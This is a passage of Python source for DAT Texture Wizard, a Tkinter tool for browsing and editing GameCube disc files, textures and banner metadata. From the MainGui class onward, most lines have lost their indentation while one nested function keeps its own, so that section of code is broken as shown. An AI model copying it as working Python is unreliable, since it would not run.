			spotLabels = spotsInnerFrame.interior.grid_slaves( column=0 )[:-1] # Excludes header label
			spotLabels.reverse()		# grid_slaves returns widgets in reverse grid order
			firstLabel = spotLabels[collisionLink.origPoints[0]]
			secondLabel = spotLabels[collisionLink.origPoints[1]]

			# Adjust the colors of the labels
			firstLabel['bg'] = hoverColor
			secondLabel['bg'] = hoverColor
			self.highlightedLabels.extend( [firstLabel, secondLabel] )

			# Scroll to the position of the first label
			canvasHeight = spotsInnerFrame.canvas.bbox( 'all' )[-1]
			scrollPosition = (firstLabel.winfo_y() - 40) / float( canvasHeight ) # Slight offset (-40), so the link is not at the absolute top
			spotsInnerFrame.canvas.yview_moveto( scrollPosition )

		else: # On the links tab
			# Change the background color of the highlighted widget
			widget['bg'] = hoverColor
			self.highlightedLabels.append( widget )

			# Scroll to the target link, so it's visible
			canvasHeight = self.linksInnerFrame.canvas.bbox( 'all' )[-1]
			scrollPosition = (widget.winfo_y() - 40) / float( canvasHeight ) # Slight offset (-40), so the link is not at the absolute top
			self.linksInnerFrame.canvas.yview_moveto( scrollPosition )

	def updateAreaVisibility( self ):
		""" Shows or hides collision areas in the canvas. """
		# Set render visibility
		newVisibility = self.showAreas.get()
		for area in self.areas:
			area.render = newVisibility

		# Re-draw the canvas display
		self.renderPlane.delete( 'all' )
		self.renderPlane.render()

	def toggleBasicLinkVisibility( self ):
		""" Shows or hides collision link surfaces in the canvas. """
		show = self.showBasicLinks.get()
		for link in self.collisionLinks:
			link.render = show

		# Re-draw the canvas display
		self.renderPlane.delete( 'all' )
		self.renderPlane.render()

	# def areaHovered( self, event ):
	# 	print 'area hovered'

	# def areaUnhovered( self, event ):
	# 	print 'area unhovered'

	# def deleteLink( self, linkIndex ):
	# 	print 'removing link', linkIndex

	# 	# Decrement the Link_Table_Entry_Count value in the coll_data structure
	# 	newCollLinksCount = self.collStruct.getValues()[3] - 1
	# 	globalDatFile.updateStructValue( self.collStruct, 3, newCollLinksCount )
	# 	print 'coll count changed to', newCollLinksCount

	# 	# deducedStructLength = globalDatFile.getStructLength( self.linkTable.offset )
	# 	# collLinksLength = ( newCollLinksCount * 0x10 )
	# 	# padding = deducedStructLength - ( newCollLinksCount * 0x10 )
	# 	# globalDatFile.collapseDataSpace( self.linkTable.offset + collLinksLength, padding )

	# 	# Remove the data for this link from the structure and file
	# 	# linkDataStart = linkIndex * 0x10
	# 	# self.linkTable.data = self.linkTable.data[:linkDataStart] + self.linkTable.data[linkDataStart+0x10:]
	# 	# self.linkTable.length = len( self.linkTable.data )
	# 	# self.linkTable.entryCount -= 1
	# 	self.linkTable.removeEntry( linkIndex )
	# 	print 'new struct data len:', hex( self.linkTable.length )

	# 	# Check how much space is available and needed for this new struct data, and whether the space should be shrunk
	# 	# deducedStructLength = globalDatFile.getStructLength( self.linkTable.offset )
	# 	# self.linkTable.padding = deducedStructLength - self.linkTable.length
	# 	# globalDatFile.collapseDataSpace( self.linkTable.offset + self.linkTable.length, self.linkTable.padding )

	# 	# globalDatFile.setData( self.linkTable.offset, self.linkTable.data )

	# 	# Remove this link from the collisions list and drawing canvas
	# 	#targetLink = self.collisionLinks.pop( linkIndex )
	# 	newCollLinks = []
	# 	for link in self.collisionLinks:
	# 		if link.index == linkIndex:
	# 			canvasId = getattr( link, 'id', None )
	# 			if canvasId:
	# 				print 'deleting canvas id', canvasId
	# 				self.renderPlane.delete( canvasId )
	# 		else:
	# 			newCollLinks.append( link )
	# 	self.collisionLinks = newCollLinks
	# 	self.renderPlane.shapes = self.collisionLinks + self.areas

	# 	# Reload the links tab to remove the link from the GUI
	# 	self.linksInnerFrame.clear()
	# 	self.populateLinksTab()

	# 	# Need to reinitialize file structures; reload the SA tab
	# 	clearStructuralAnalysisTab()
	# 	analyzeDatStructure()
#=============#
# ~ ~ GUI ~ ~ #
#=============#
class MainGui( Tk.Frame, object ):
def __init__( self ): # Build the interface
self.root = Tk.Tk()
self.root.withdraw() # Keeps the GUI minimized until it is fully generated
self._imageBank = {} # Repository for all GUI related images
self.root.tk.call( 'wm', 'iconphoto', self.root._w, self.imageBank('appIcon') )
self.defaultWindowWidth = 860
self.defaultWindowHeight = 640
self.root.geometry( str(self.defaultWindowWidth) + 'x' + str(self.defaultWindowHeight) + '+100+50' )
self.root.title( "DAT Texture Wizard - v" + programVersion )
self.root.minsize( width=370, height=416 )
self.dnd = TkDND( self.root ) # Set-up for drag-and-drop functionality
self.root.protocol( 'WM_DELETE_WINDOW', onProgramClose ) # Overrides the standard window close button.
# Used for other TopWindow creations.
self.root.imageFiltersWindow = None
self.root.helpWindow = None
self.root.aboutWindow = None
# Loads settings from persistent storage (settings.ini). Must be done before configuring the Settings menu
loadSettings()
# Set the default font size and color.
globalFontSize = int( settings.get( 'General Settings', 'globalFontSize' ) )
if generalBoolSettings['useAltFontColor'].get():
# User wants to use their own color
self.globalFontColor = settings.get( 'General Settings', 'altFontColor' )
try: # Make sure it's a valid color
self.root.winfo_rgb( self.globalFontColor ) # Returns an RGB tuple if successful
except:
msg( 'The alternate color, "' + self.globalFontColor + '", is not a valid color. The string should be written as #RRGGBB, '
'or a basic color such as, "blue", "teal", "orange", etc. The default font color will be used instead.' )
self.globalFontColor = '#071240'
else: self.globalFontColor = '#071240' # Default
for font in tkFont.names():
tkFont.nametofont( font ).configure( size=globalFontSize )
self.defaultSystemBgColor = self.root.cget( 'background' )
#self.root.option_add("*Font", "TkDefaultFont") # Changes all of the various used fonts to the default font.
# Apply the font color to the default font style class.
style = ttk.Style()
style.configure( '.', font="TkDefaultFont", foreground=self.globalFontColor )
style.configure( "Treeview.Heading", font="TkDefaultFont", foreground=self.globalFontColor )
style.configure( 'TLabel', justify='center' )
style.configure( 'Edited.TMenubutton', background='#faa' ) # For OptionMenu widgets (dunno why the name is so different :/)
# - Main Menu Bar & Context Menus.
self.menubar = Tk.Menu( self.root )
# Keyboard shortcut:
self.menubar.add_cascade( label='File', menu=fileMenu( self.menubar ), underline=0 ) # File [F]
self.menubar.add_cascade( label='Settings', menu=settingsMenu( self.menubar ), underline=0 ) # Settings [S]
self.menubar.add_cascade( label='Disc Operations', menu=isoMenuOptions( self.menubar ), underline=0 ) # Disc Operations [D]
self.menubar.add_cascade( label='Texture Operations', menu=textureMenuOptions( self.menubar ), underline=0 ) # Texture Operations [T]
toolsDropdown = Tk.Menu( self.menubar, tearoff=False ) # Tools [T]
self.menubar.add_cascade( menu=toolsDropdown, label='Tools', underline=0 )
toolsDropdown.add_command( label='Color Converter', underline=0, command=MeleeColorPicker ) # C
toolsDropdown.add_command( label='Image Data Length Calculator', underline=6, command=lambda: ImageDataLengthCalculator(Gui.root) ) # D
helpDropdown = Tk.Menu( self.menubar, tearoff=False ) # Help [H]
self.menubar.add_cascade( menu=helpDropdown, label='Help', underline=0 )
helpDropdown.add_command( label='General Help', underline=0, command=showHelpWindow ) # H
helpDropdown.add_command( label='View Program Usage', underline=5, command=showReadMeFile ) # R
helpDropdown.add_command( label='Support DTW', underline=0, command=showSupportWindow ) # S
helpDropdown.add_command( label='About DAT Texture Wizard', underline=0, command=showAboutWindow ) # A
self.root.config( menu=self.menubar )
self.menubar.bind( "<<MenuSelect>>", self.updateMainMenuOptions )
# - Main Tab Interface.
self.mainTabFrame = ttk.Notebook( self.root )
# Tab 1 | Disc File Tree
self.discTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.discTab, text=' Disc File Tree ' )
self.dnd.bindtarget( self.discTab, lambda event: dndHandler( event, 'discTab' ), 'text/uri-list' )
# Frame for the File Tree tab
isoFrameRow1 = ttk.Frame( self.discTab, padding="11 0 0 11" ) # Padding order: Left, Top, Right, Bottom.
isoFrameRow1.pack( fill='both', expand=1 )
# Disc shortcut links
fileTreeColumn = Tk.Frame( isoFrameRow1 )
isoQuickLinks = Tk.Frame( fileTreeColumn )
ttk.Label( isoQuickLinks, text='Disc Shortcuts:' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='System', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='|' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='Characters', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='|' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='Shortcuts', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='|' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='Menus (CSS/SSS)', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='|' ).pack( side='left', padx=4 )
ttk.Label( isoQuickLinks, text='Stages', foreground='#00F', cursor='hand2' ).pack( side='left', padx=4 )
for label in isoQuickLinks.winfo_children():
if label['text'] != '|': label.bind( '<1>', discFileTreeQuickLinks )
isoQuickLinks.pack( pady=1 )
# File Tree start
isoFileTreeWrapper = Tk.Frame( fileTreeColumn ) # Contains just the ISO treeview and its scroller (since they need a different packing than the above links).
self.isoFileScroller = Tk.Scrollbar( isoFileTreeWrapper )
self.isoFileTree = ttk.Treeview( isoFileTreeWrapper, columns=('description'), yscrollcommand=self.isoFileScroller.set )
self.isoFileTree.heading( '#0', anchor='center', text='File (Sorted by FST)', command=lambda: treeview_sort_column(self.isoFileTree, 'file', False) ) # , command=function
self.isoFileTree.column( '#0', anchor='center', minwidth=180, stretch=1, width=230 ) # "#0" is implicit in the columns definition above.
self.isoFileTree.heading( 'description', anchor='center', text='Description' )
self.isoFileTree.column( 'description', anchor='w', minwidth=180, stretch=1, width=312 )
self.isoFileTree.tag_configure( 'changed', foreground='red' )
self.isoFileTree.tag_configure( 'changesSaved', foreground='#292' ) # The 'save'-green color
self.isoFileTree.pack( side='left', fill='both', expand=1 )
self.isoFileScroller.config( command=self.isoFileTree.yview )
self.isoFileScroller.pack( side='left', fill='y' )
# Add treeview event handlers
self.isoFileTree.bind( '<<TreeviewSelect>>', onFileTreeSelect )
self.isoFileTree.bind( '<Double-1>', onFileTreeDoubleClick )
self.isoFileTree.bind( "<3>", createFileTreeContextMenu ) # Right-click
isoFileTreeWrapper.pack( fill='both', expand=1 )
fileTreeColumn.pack( side='left', fill='both', expand=1 )
# Add the background image to the file tree
self.isoFileTreeBg = Tk.Label( self.isoFileTree, image=self.imageBank('dndTarget'), borderwidth=0, highlightthickness=0 )
self.isoFileTreeBg.place( relx=0.5, rely=0.5, anchor='center' )
# ISO File Tree end / ISO Information panel begin
isoOpsPanel = ttk.Frame( isoFrameRow1, padding='0 9 0 0' ) # Padding order: Left, Top, Right, Bottom.
self.isoOverviewFrame = Tk.Frame( isoOpsPanel )
self.gameIdText = Tk.StringVar()
ttk.Label( self.isoOverviewFrame, textvariable=self.gameIdText, font="-weight bold" ).grid( column=0, row=0, padx=2 )
self.bannerCanvas = Tk.Canvas( self.isoOverviewFrame, width=96, height=32, borderwidth=0, highlightthickness=0 )
self.bannerCanvas.grid( column=1, row=0, padx=2 ) #, borderwidth=0, highlightthickness=0
self.bannerCanvas.pilImage = None
self.bannerCanvas.bannerGCstorage = None
self.bannerCanvas.canvasImageItem = None
self.isoOverviewFrame.columnconfigure( 0, weight=1 )
self.isoOverviewFrame.columnconfigure( 1, weight=1 )
self.isoOverviewFrame.pack( fill='x', padx=6, pady=11 )
self.isoPathShorthand = Tk.StringVar()
self.isoPathShorthandLabel = ttk.Label( isoOpsPanel, textvariable=self.isoPathShorthand )
self.isoPathShorthandLabel.pack()
internalFileDetails = ttk.Labelframe( isoOpsPanel, text=' File Details ', labelanchor='n' )
self.isoOffsetText = Tk.StringVar()
self.isoOffsetText.set( 'Disc Offset: ' )
ttk.Label( internalFileDetails, textvariable=self.isoOffsetText, width=27, anchor='w' ).pack( padx=15, pady=4 )
self.internalFileSizeText = Tk.StringVar()
self.internalFileSizeText.set( 'File Size: ' ) # The line break preserves space for the next line, which is used with multiple file (or folder) selections.
ttk.Label( internalFileDetails, textvariable=self.internalFileSizeText, width=27, anchor='w' ).pack( padx=15, pady=0 )
self.internalFileSizeLabelSecondLine = Tk.StringVar()
self.internalFileSizeLabelSecondLine.set( '' )
ttk.Label( internalFileDetails, textvariable=self.internalFileSizeLabelSecondLine, width=27, anchor='w' ).pack( padx=15, pady=0 )
internalFileDetails.pack( padx=15, pady=16, ipady=4 )
self.isoOpsPanelButtons = Tk.Frame( isoOpsPanel )
ttk.Button( self.isoOpsPanelButtons, text="Export", command=exportIsoFiles, state='disabled' ).grid( row=0, column=0, padx=7 )
ttk.Button( self.isoOpsPanelButtons, text="Import", command=importSingleIsoFile, state='disabled' ).grid( row=0, column=1, padx=7 )
ttk.Button( self.isoOpsPanelButtons, text="Browse Textures", command=browseTexturesFromDisc, state='disabled', width=18 ).grid( row=1, column=0, columnspan=2, pady=(7,0) )
ttk.Button( self.isoOpsPanelButtons, text="Analyze Structure", command=analyzeFileFromDisc, state='disabled', width=18 ).grid( row=2, column=0, columnspan=2, pady=(7,0) )
self.isoOpsPanelButtons.pack( pady=2 )
# Add the Magikoopa image
kamekFrame = Tk.Frame( isoOpsPanel )
ttk.Label( kamekFrame, image=self.imageBank('magikoopa') ).place( relx=0.5, rely=0.5, anchor='center' )
kamekFrame.pack( fill='both', expand=1 )
isoOpsPanel.pack( side='left', fill='both', expand=1 )
# Tab 2 | Disc Details
self.discDetailsTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.discDetailsTab, text=' Disc Details ' )
self.dnd.bindtarget( self.discDetailsTab, lambda event: dndHandler( event, 'discTab' ), 'text/uri-list' ) # Drag-and-drop functionality treats this as the discTab
# The start of row 1
self.discDetailsTab.row1 = ttk.Frame( self.discDetailsTab, padding=12 )
ttk.Label( self.discDetailsTab.row1, text=" ISO / GCM:" ).pack( side='left' )
self.isoDestination = Tk.StringVar()
isoDestEntry = ttk.Entry( self.discDetailsTab.row1, textvariable=self.isoDestination, takefocus=False )
isoDestEntry.pack( side='left', fill='x', expand=1, padx=12 )
isoDestEntry.bind( '<Return>', openIsoDestination )
self.discDetailsTab.row1.pack( fill='x' )
# The start of row 2
self.discDetailsTab.row2 = ttk.Frame( self.discDetailsTab, padding=0 ) # Padding order: Left, Top, Right, Bottom.
self.discDetailsTab.row2.padx = 5
self.discDetailsTab.row2.gameIdLabel = ttk.Label( self.discDetailsTab.row2, text='Game ID:' )
self.discDetailsTab.row2.gameIdLabel.grid( column=0, row=0, rowspan=4, padx=self.discDetailsTab.row2.padx )
self.gameIdTextEntry = DisguisedEntry( self.discDetailsTab.row2, respectiveLabel=self.discDetailsTab.row2.gameIdLabel,
background=self.defaultSystemBgColor, textvariable=self.gameIdText, width=8 )
self.gameIdTextEntry.grid( column=1, row=0, rowspan=4, padx=self.discDetailsTab.row2.padx )
self.gameIdTextEntry.offset = 0
self.gameIdTextEntry.maxByteLength = 6
self.gameIdTextEntry.updateName = 'Game ID'
self.gameIdTextEntry.targetFile = 'boot.bin'
self.gameIdTextEntry.bind( '<Return>', updateDiscDetails )
ttk.Label( self.discDetailsTab.row2, image=self.imageBank('gameIdBreakdownImage') ).grid( column=2, row=0, rowspan=4, padx=self.discDetailsTab.row2.padx )
consoleIdText = Tk.StringVar()
gameCodeText = Tk.StringVar()
regionCodeText = Tk.StringVar()
makerCodeText = Tk.StringVar()
ttk.Label( self.discDetailsTab.row2, text='Console ID:' ).grid( column=3, row=0, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=consoleIdText, width=3 ).grid( column=4, row=0, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, text='Game Code:' ).grid( column=3, row=1, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=gameCodeText, width=3 ).grid( column=4, row=1, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, text='Region Code:' ).grid( column=3, row=2, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=regionCodeText, width=3 ).grid( column=4, row=2, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, text='Maker Code:' ).grid( column=3, row=3, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=makerCodeText, width=3 ).grid( column=4, row=3, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Separator( self.discDetailsTab.row2, orient='vertical' ).grid( column=5, row=0, sticky='ns', rowspan=4, padx=self.discDetailsTab.row2.padx, pady=6 )
self.bannerCanvas2 = Tk.Canvas( self.discDetailsTab.row2, width=96, height=32, borderwidth=0, highlightthickness=0 )
self.bannerCanvas2.grid( column=6, row=1, rowspan=2, padx=self.discDetailsTab.row2.padx )
self.bannerCanvas2.pilImage = None
self.bannerCanvas2.bannerGCstorage = None
self.bannerCanvas2.canvasImageItem = None
bannerImportExportFrame = ttk.Frame( self.discDetailsTab.row2 )
bannerExportLabel = ttk.Label( bannerImportExportFrame, text='Export', foreground='#00F', cursor='hand2' )
bannerExportLabel.bind( '<1>', exportBanner )
bannerExportLabel.pack( side='left' )
ttk.Label( bannerImportExportFrame, text=' | ' ).pack( side='left' )
bannerImportLabel = ttk.Label( bannerImportExportFrame, text='Import', foreground='#00F', cursor='hand2' )
bannerImportLabel.bind( '<1>', importImageFiles )
bannerImportLabel.pack( side='left' )
bannerImportExportFrame.grid( column=6, row=3, padx=self.discDetailsTab.row2.padx )
ttk.Separator( self.discDetailsTab.row2, orient='vertical' ).grid( column=7, row=0, sticky='ns', rowspan=4, padx=self.discDetailsTab.row2.padx, pady=6 )
self.isoVersionText = Tk.StringVar()
self.isoFileCountText = Tk.StringVar()
self.isoFilesizeText = Tk.StringVar()
self.isoFilesizeTextLine2 = Tk.StringVar()
ttk.Label( self.discDetailsTab.row2, text='Disc Revision:' ).grid( column=8, row=0, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=self.isoVersionText ).grid( column=9, row=0, sticky='w', padx=self.discDetailsTab.row2.padx )
# The 20XX Version label will be here, at column 8/9, row 1, if the disc is 20XX
ttk.Label( self.discDetailsTab.row2, text='Total File Count:' ).grid( column=8, row=2, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=self.isoFileCountText ).grid( column=9, row=2, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, text='Disc Size:' ).grid( column=8, row=3, sticky='e', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=self.isoFilesizeText ).grid( column=9, row=3, sticky='w', padx=self.discDetailsTab.row2.padx )
ttk.Label( self.discDetailsTab.row2, textvariable=self.isoFilesizeTextLine2 ).grid( column=8, row=4, columnspan=2, sticky='e', padx=self.discDetailsTab.row2.padx )
# Set cursor hover bindings for the help text
previousLabelWidget = ( None, '' )
for widget in self.discDetailsTab.row2.winfo_children(): # Widgets will be listed in the order that they were added to the parent
if widget.winfo_class() == 'TLabel' and ':' in widget['text']: # Bindings for the preceding Label
updateName = widget['text'].replace(':', '')
widget.bind( '<Enter>', lambda event, helpTextName=updateName: setDiscDetailsHelpText(helpTextName) )
widget.bind( '<Leave>', setDiscDetailsHelpText )
previousLabelWidget = ( widget, updateName )
elif previousLabelWidget[0]: # Bindings for the labels displaying the value/info
widget.bind( '<Enter>', lambda event, helpTextName=previousLabelWidget[1]: setDiscDetailsHelpText(helpTextName) )
widget.bind( '<Leave>', setDiscDetailsHelpText )
previousLabelWidget = ( None, '' )
elif widget.grid_info()['row'] == '4': # For the second label for isoFilesize
widget.bind( '<Enter>', lambda event: setDiscDetailsHelpText('Disc Size') )
widget.bind( '<Leave>', setDiscDetailsHelpText )
self.discDetailsTab.row2.pack( padx=15, pady=0, expand=1 )
self.discDetailsTab.row2.columnconfigure( 2, weight=0 ) # Allows the middle column (the actual text input fields) to stretch with the window
self.discDetailsTab.row2.columnconfigure( 4, weight=1 )
self.discDetailsTab.row2.columnconfigure( 5, weight=0 )
self.discDetailsTab.row2.columnconfigure( 6, weight=1 )
self.discDetailsTab.row2.columnconfigure( 7, weight=0 )
self.discDetailsTab.row2.columnconfigure( 8, weight=1 )
virtualLabel = ttk.Label( self.discDetailsTab, text='0,000,000,000 bytes' ) # Used to figure out how much space various fonts/sizes will require
predictedComfortableWidth = int( virtualLabel.winfo_reqwidth() * 1.2 ) # This should be plenty of space for the total disc size value.
self.discDetailsTab.row2.columnconfigure( 9, weight=1, minsize=predictedComfortableWidth )
# The start of row 3
self.discDetailsTab.row3 = Tk.Frame( self.discDetailsTab ) # Uses a grid layout for its children
self.shortTitle = Tk.StringVar()
self.shortMaker = Tk.StringVar()
self.longTitle = Tk.StringVar()
self.longMaker = Tk.StringVar()
borderColor1 = '#b7becc'; borderColor2 = '#0099f0'
ttk.Label( self.discDetailsTab.row3, text='Image Name:' ).grid( column=0, row=0, sticky='e' )
self.gameName1Field = Tk.Text( self.discDetailsTab.row3, height=3, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0 )
gameName1FieldScrollbar = Tk.Scrollbar( self.discDetailsTab.row3, command=self.gameName1Field.yview ) # This is used instead of just a ScrolledText widget because .getattr() won't work on the latter
self.gameName1Field['yscrollcommand'] = gameName1FieldScrollbar.set
self.gameName1Field.grid( column=1, row=0, columnspan=2, sticky='ew' )
gameName1FieldScrollbar.grid( column=3, row=0 )
self.gameName1Field.offset = 0x20; self.gameName1Field.maxByteLength = 992; self.gameName1Field.updateName = 'Image Name'; self.gameName1Field.targetFile = 'boot.bin'
ttk.Label( self.discDetailsTab.row3, text='992' ).grid( column=4, row=0 )
textWidgetFont = self.gameName1Field['font']
ttk.Label( self.discDetailsTab.row3, text='Short Title:' ).grid( column=0, row=1, sticky='e' )
gameName2Field = Tk.Entry( self.discDetailsTab.row3, width=32, textvariable=self.shortTitle, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0, font=textWidgetFont )
gameName2Field.grid( column=1, row=1, columnspan=2, sticky='w' )
gameName2Field.offset = 0x1820; gameName2Field.maxByteLength = 32; gameName2Field.updateName = 'Short Title'; gameName2Field.targetFile = 'opening.bnr'
ttk.Label( self.discDetailsTab.row3, text='32' ).grid( column=4, row=1 )
ttk.Label( self.discDetailsTab.row3, text='Short Maker:' ).grid( column=0, row=2, sticky='e' )
developerField = Tk.Entry( self.discDetailsTab.row3, width=32, textvariable=self.shortMaker, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0, font=textWidgetFont )
developerField.grid( column=1, row=2, columnspan=2, sticky='w' )
developerField.offset = 0x1840; developerField.maxByteLength = 32; developerField.updateName = 'Short Maker'; developerField.targetFile = 'opening.bnr'
ttk.Label( self.discDetailsTab.row3, text='32' ).grid( column=4, row=2 )
ttk.Label( self.discDetailsTab.row3, text='Long Title:' ).grid( column=0, row=3, sticky='e' )
fullGameTitleField = Tk.Entry( self.discDetailsTab.row3, width=64, textvariable=self.longTitle, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0, font=textWidgetFont )
fullGameTitleField.grid( column=1, row=3, columnspan=2, sticky='w' )
fullGameTitleField.offset = 0x1860; fullGameTitleField.maxByteLength = 64; fullGameTitleField.updateName = 'Long Title'; fullGameTitleField.targetFile = 'opening.bnr'
ttk.Label( self.discDetailsTab.row3, text='64' ).grid( column=4, row=3 )
ttk.Label( self.discDetailsTab.row3, text='Long Maker:' ).grid( column=0, row=4, sticky='e' )
devOrDescField = Tk.Entry( self.discDetailsTab.row3, width=64, textvariable=self.longMaker, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0, font=textWidgetFont )
devOrDescField.grid( column=1, row=4, columnspan=2, sticky='w' )
devOrDescField.offset = 0x18a0; devOrDescField.maxByteLength = 64; devOrDescField.updateName = 'Long Maker'; devOrDescField.targetFile = 'opening.bnr'
ttk.Label( self.discDetailsTab.row3, text='64' ).grid( column=4, row=4 )
ttk.Label( self.discDetailsTab.row3, text='Comment:' ).grid( column=0, row=5, sticky='e' )
self.gameDescField = Tk.Text( self.discDetailsTab.row3, height=2, highlightbackground=borderColor1, highlightcolor=borderColor2, highlightthickness=1, borderwidth=0 )
self.gameDescField.grid( column=1, row=5, columnspan=2, sticky='ew' )
self.gameDescField.offset = 0x18e0; self.gameDescField.maxByteLength = 128; self.gameDescField.updateName = 'Comment'; self.gameDescField.targetFile = 'opening.bnr'
self.gameDescField.bind( '<Shift-Return>', disallowLineBreaks )
ttk.Label( self.discDetailsTab.row3, text='128' ).grid( column=4, row=5 )
ttk.Label( self.discDetailsTab.row3, text='Encoding:' ).grid( column=0, row=6, sticky='e' )
self.discDetailsTab.encodingFrame = ttk.Frame( self.discDetailsTab.row3 )
self.countryCode = Tk.StringVar()
self.countryCode.set( 'us' ) # This is just a default. Officially set when a disc is loaded.
Tk.Radiobutton( self.discDetailsTab.encodingFrame, text='English/EU (Latin_1)', variable=self.countryCode, value='us', command=reloadBanner ).pack( side='left', padx=(9,6) )
Tk.Radiobutton( self.discDetailsTab.encodingFrame, text='Japanese (Shift_JIS)', variable=self.countryCode, value='jp', command=reloadBanner ).pack( side='left', padx=6 )
self.discDetailsTab.encodingFrame.grid( column=1, row=6, sticky='w' )
ttk.Label( self.discDetailsTab.row3, text='Max Characters/Bytes ^ ' ).grid( column=2, row=6, columnspan=3, sticky='e' )
# Add event handlers for the updating function and help/hover text (also sets x/y padding)
children = self.discDetailsTab.row3.winfo_children()
previousWidget = children[0]
for widget in children:
widget.grid_configure( padx=4, pady=3 )
updateName = getattr( widget, 'updateName', None )
if updateName:
# Cursor hover bindings for the preceding Label
previousWidget.bind( '<Enter>', lambda event, helpTextName=updateName: setDiscDetailsHelpText(helpTextName) )
previousWidget.bind( '<Leave>', setDiscDetailsHelpText )
# Data entry (pressing 'Enter') and cursor hover bindings for the text entry field
widget.bind( '<Return>', updateDiscDetails )
widget.bind( '<Enter>', lambda event, helpTextName=updateName: setDiscDetailsHelpText(helpTextName) )
widget.bind( '<Leave>', setDiscDetailsHelpText )
previousWidget = widget
self.discDetailsTab.row3.columnconfigure( 1, weight=1 ) # Allows the middle column (the actual text input fields) to stretch with the window
self.discDetailsTab.row3.pack( fill='both', expand=1, padx=15, pady=4 )
# The start of row 4
self.discDetailsTab.textHeightAssementWidget = ttk.Label( self.root, text=' \n \n \n ' )
self.discDetailsTab.textHeightAssementWidget.pack( side='bottom' )
self.discDetailsTab.textHeightAssementWidget.update()
theHeightOf4Lines = self.discDetailsTab.textHeightAssementWidget.winfo_height() # A dynamic value for differing system/user font sizes
self.discDetailsTab.textHeightAssementWidget.destroy() # The above widget won't even be visible for a moment, because the application is minimized until drawing is complete.
ttk.Separator( self.discDetailsTab, orient='horizontal' ).pack( fill='x', expand=1, padx=30 )
self.discDetailsTab.row4 = ttk.Frame( self.discDetailsTab, height=theHeightOf4Lines, padding='0 0 0 12' ) # Padding order: Left, Top, Right, Bottom.
self.discDetailsTabHelpText = Tk.StringVar()
self.discDetailsTabHelpText.set( "Hover over an item to view information on it.\nPress 'Enter' to submit changes in a text input field before saving." )
self.discDetailsTab.helpTextLabel = ttk.Label( self.discDetailsTab.row4, textvariable=self.discDetailsTabHelpText, wraplength=680 ) #, background='white'
self.discDetailsTab.helpTextLabel.pack( expand=1, pady=0 )
self.discDetailsTab.row4.pack( expand=1, fill='both' )
self.discDetailsTab.row4.pack_propagate( False )
# Establish character length validation, and updates between GameID labels
def validateDiscDetailLen( stringVar, maxCharacters ):
    """ Tk variable-trace callback: enforces a maximum character count on a disc-detail
        StringVar, truncating any over-long entry in place. For the Game ID field
        (recognized below by its small maxCharacters value), it additionally splits the
        entered ID into its component labels (console ID, game code, region, maker). """
    enteredValue = stringVar.get()
    # Truncating via .set() re-fires this trace once more, but the second pass is a no-op
    if len( enteredValue ) > maxCharacters: stringVar.set( enteredValue[:maxCharacters] )
    elif maxCharacters < 10: # i.e. the gameIdText
        if stringVar == self.gameIdText:
            # Clear all four sub-field labels first, so partially-typed IDs blank the tail fields
            consoleIdText.set( '' )
            gameCodeText.set( '' )
            regionCodeText.set( '' )
            makerCodeText.set( '' )
            # Game ID layout: [console][game code x2][region][maker code]; e.g. 'GALE01'
            if len(enteredValue) > 0: consoleIdText.set( enteredValue[0] )
            if len(enteredValue) > 1: gameCodeText.set( enteredValue[1:3] )
            if len(enteredValue) > 3: regionCodeText.set( enteredValue[3] )
            if len(enteredValue) > 4: makerCodeText.set( enteredValue[4:7] )
self.gameIdText.trace( 'w', lambda nm, idx, mode, var=self.gameIdText: validateDiscDetailLen(var, 6) )
self.shortTitle.trace( 'w', lambda nm, idx, mode, var=self.shortTitle: validateDiscDetailLen(var, 32) )
self.shortMaker.trace( 'w', lambda nm, idx, mode, var=self.shortMaker: validateDiscDetailLen(var, 32) )
self.longTitle.trace( 'w', lambda nm, idx, mode, var=self.longTitle: validateDiscDetailLen(var, 64) )
self.longMaker.trace( 'w', lambda nm, idx, mode, var=self.longMaker: validateDiscDetailLen(var, 64) )
# Tab 3 | DAT Texture Tree tab
self.datTab = ttk.Frame( self.mainTabFrame )
self.mainTabFrame.add( self.datTab, text=' DAT Texture Tree ' )
self.dnd.bindtarget( self.datTab, lambda event: dndHandler( event, 'datTab' ), 'text/uri-list' )
# DAT tab, row 1
datTabRow1 = ttk.Frame( self.datTab, padding="12 12 12 12" ) # Padding order: Left, Top, Right, Bottom.
ttk.Label( datTabRow1, text=" DAT / USD:" ).pack( side='left' )
